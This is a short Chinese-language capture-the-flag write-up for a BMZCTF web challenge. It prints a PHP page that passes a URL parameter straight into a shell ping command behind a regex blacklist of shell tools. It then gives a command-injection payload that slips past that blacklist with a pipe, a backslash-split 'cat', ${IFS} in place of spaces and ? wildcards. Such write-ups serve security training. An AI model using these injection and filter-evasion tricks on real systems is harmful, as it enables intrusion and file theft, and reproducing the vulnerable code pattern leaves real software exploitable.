BMZCTF 端午节就该吃粽子


端午节就该吃粽子

题目如下让我们访问login.php

 

 然后就一个登录界面查看源码发现index.php

 我们直接访问发现没有结果使用伪协议读取

 然后我们使用base64解密

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |python|sh|nc|tac|rev|more|tailf|index|php|head|nl|sort|less|cat|ruby|perl|bash|rm|cp|mv|\*)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script>");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo $a;
}
?>

发现有两个正则需要绕过,构造payload

?url=127.0.0.1|ca\t${IFS}/????

|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,????绕过对flag的匹配这样就能成功拿下flag